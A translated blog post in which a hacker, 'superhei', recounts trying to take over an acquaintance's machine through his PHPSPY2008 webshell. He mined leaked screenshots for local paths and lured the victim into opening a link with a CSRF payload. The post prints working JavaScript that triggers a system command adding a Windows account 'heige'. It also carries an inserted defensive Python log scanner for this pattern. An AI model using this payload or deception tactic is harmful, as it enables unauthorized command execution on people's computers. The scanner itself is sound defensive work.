By: superhei
Just for fun
A few days ago I read on angel's blog that he is writing PHPSPY2008: http://www.sablog.net/blog/phpspy-2008/. He also posted a lot of test screenshots, such as:
http://www.sablog.net/blog/attachment.php?id=543
In these images angel exposes a lot of information, such as the URL and relative path of his local web server:
http://localhost/phpspy/2008.php
Absolute path: F:/www/phpspy/
PHPSPY2007 and PHPSPY2006 are in the same directory.
There is also some of the structure of his local MySQL: the database name and the table prefix. I remember there was also a user's md5 hash [it seems to have been deleted now :)]. In addition, angel uses Maxthon 2.06.
This information is very dangerous, so I decided to test whether I could use it to get into angel's own box [just for fun]:
Idea 1: try the md5 hash
Idea 2: use CSRF to execute commands directly through http://localhost/phpspy/2008.php
Idea 1 is very troublesome to try and not really interesting to think about. Idea 2 is easy to carry out and intuitive, and it makes up for the fact that "XSS/CSRF in penetration testing" [1] did not use a CSRF attack. First, let's understand how the command-execution variables are submitted in 2008.php. At that time I didn't know whether angel had changed it, but 2006 and 2007 are still in his directory. Just then angel contacted me and asked friends in the group to test 2008.php. Haha, it's time....
So I looked at the format of the 2008.php command-execution submission:
POST /2008.php?action=shell HTTP/1.1
...............
execfunc=system&command=net+user&submit=%C8%B7%B6%A8
Can we switch to GET for the submission? Submit: 2008.php?action=shell&execfunc=system&command=net user. It reads the request variable [2].
OK. angel uses Maxthon 2.06, which uses IE as its core, so there should be no security plug-ins like NoScript on Firefox. We can use JS:
<script>
// Target URL: the command is carried entirely in the GET query string
var url = "http://localhost/phpspy/2008.php?action=shell&execfunc=system&command=net user heige /add | echo fuck > c:\\heige.txt";
getURL(url);
// Load the URL as an invisible image so the browser sends the request silently
function getURL(s) {
    var image = new Image();
    image.style.width = 0;
    image.style.height = 0;
    image.src = s;
}
</script>
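The request above is the kind of thing a web-server log records, so here is an added example, not code from superhei's post or from PHPSPY: a small Python scanner over constructed Apache combined-format log lines that flags a 2008.php shell action whose execfunc/command arrive in a GET query string (what an <img src> can send) or that carries a Referer from another host. The log lines, the attacker.example host and the localhost hostname are assumptions for the sample.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache combined-format lines, not real traffic from angel's box.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Jan/2008:20:01:12 +0800] "POST /phpspy/2008.php?action=shell HTTP/1.1" 200 512 "http://localhost/phpspy/2008.php?action=shell" "Maxthon"
127.0.0.1 - - [10/Jan/2008:20:03:44 +0800] "GET /phpspy/2008.php?action=shell&execfunc=system&command=net+user HTTP/1.1" 200 480 "http://attacker.example/2008.php" "Maxthon"
127.0.0.1 - - [10/Jan/2008:20:04:01 +0800] "GET /phpspy/index.php HTTP/1.1" 200 1200 "-" "Maxthon"
"""

LOG_RE = re.compile(r'^\S+ \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$')

def parse_line(line):
    """Split one log line into fields; the query string becomes a dict."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    query = urlparse(entry["target"]).query
    entry["query"] = {k: v[0] for k, v in parse_qs(query).items()}
    return entry

def is_cross_site(referer, host):
    """True only when a Referer is present and names a different host."""
    if referer in ("", "-"):
        return False
    return urlparse(referer).hostname != host

def flag(entry, host="localhost"):
    """Reasons this request looks like CSRF-driven command execution."""
    q = entry["query"]
    if q.get("action") != "shell":
        return []
    reasons = []
    # GET with execfunc/command in the URL is exactly what an <img src> can send.
    if entry["method"] == "GET" and {"execfunc", "command"} <= q.keys():
        reasons.append("command passed in GET query (image-triggerable)")
    if is_cross_site(entry["referer"], host):
        reasons.append("cross-site referer " + entry["referer"])
    return reasons

def scan(log_text, host="localhost"):
    """Return (timestamp, command, reasons) for every suspicious line."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        reasons = flag(entry, host) if entry else []
        if reasons:
            hits.append((entry["ts"], entry["query"].get("command"), reasons))
    return hits
```

The same-site POST in the sample is not flagged because its command travels in the body; only the GET with a foreign Referer is reported, with both reasons.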
Then I put it into a 2008.php on one of my own web spaces and waited to send it to angel for testing. But when I was done, angel was not online, and I had to wait until the second day. So I said in the group that 2008.php did not run very well on my space, and angel actually opened the link.....
Result: I did not succeed. angel said he had not logged in to his http://localhost/phpspy/2008.php. In fact, the test code does not need a login!!! The cookies should have been saved anyway, but angel says the cookies could not be saved because of a problem with his computer!!!!! Heaven's will ~~~, everything is fate! :)
In the end, XSS/CSRF is very sinister and hard to defend against. While writing this article I was reading it with both eyes.....
[1]: http://superhei.blogbus.com/logs/11257167.html
[2]: http://superhei.blogbus.com/logs/11412189.html